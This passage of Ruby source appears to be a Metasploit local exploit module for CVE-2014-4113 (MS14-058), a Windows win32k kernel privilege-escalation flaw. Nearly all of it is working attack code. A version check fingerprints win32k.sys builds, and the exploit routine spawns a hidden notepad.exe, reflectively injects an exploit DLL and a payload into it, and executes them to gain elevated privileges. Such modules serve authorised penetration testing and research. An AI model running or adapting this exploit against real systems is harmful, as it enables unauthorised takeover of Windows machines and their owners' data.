[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
],
'Payload' =>
{
'Space' => 4096,
'DisableNops' => true
},
'References' =>
[
['CVE', '2014-4113'],
['OSVDB', '113167'],
['BID', '70364'],
['MSB', 'MS14-058'],
['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/']
],
'DisclosureDate' => 'Oct 14 2014',
'DefaultTarget' => 0
}))
end
def check
os = sysinfo["OS"]
if os !~ /windows/i
return Exploit::CheckCode::Unknown
end
if sysinfo["Architecture"] =~ /(wow|x)64/i
arch = ARCH_X86_64
elsif sysinfo["Architecture"] =~ /x86/i
arch = ARCH_X86
end
file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
major, minor, build, revision, branch = file_version(file_path)
vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
# Neither target suports Windows 8 or 8.1
return Exploit::CheckCode::Safe if build == 9200
return Exploit::CheckCode::Safe if build == 9600
if arch == ARCH_X86
return Exploit::CheckCode::Detected if [2600, 3790, 7600, 7601].include?(build)
else
return Exploit::CheckCode::Detected if build == 7601
end
return Exploit::CheckCode::Unknown
end
def exploit
if is_system?
fail_with(Exploit::Failure::None, 'Session is already elevated')
end
if check == Exploit::CheckCode::Safe
fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
end
if sysinfo["Architecture"] =~ /wow64/i
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
elsif sysinfo["Architecture"] =~ /x64/ && target.arch.first == ARCH_X86
fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
elsif sysinfo["Architecture"] =~ /x86/ && target.arch.first == ARCH_X86_64
fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
end
print_status('Launching notepad to host the exploit...')
notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
begin
process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
print_good("Process #{process.pid} launched.")
rescue Rex::Post::Meterpreter::RequestError
# Reader Sandbox won't allow to create a new process:
# stdapi_sys_process_execute: Operation failed: Access is denied.
print_status('Operation failed. Trying to elevate the current process...')
process = client.sys.process.open
end
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
if target.arch.first == ARCH_X86
dll_file_name = 'cve-2014-4113.x86.dll'
else
dll_file_name = 'cve-2014-4113.x64.dll'
end
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4113', dll_file_name)
library_path = ::File.expand_path(library_path)
print_status("Injecting exploit into #{process.pid}...")
exploit_mem, offset = inject_dll_into_process(process, library_path)
print_status("Exploit injected. Injecting payload into #{process.pid}...")
payload_mem = inject_into_process(process, payload.encoded)
# invoke the exploit, passing in the address of the payload that
# we want invoked on successful exploitation.
print_status('Payload injected. Executing exploit...')
process.thread.create(exploit_mem + offset, payload_mem)
print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
end
end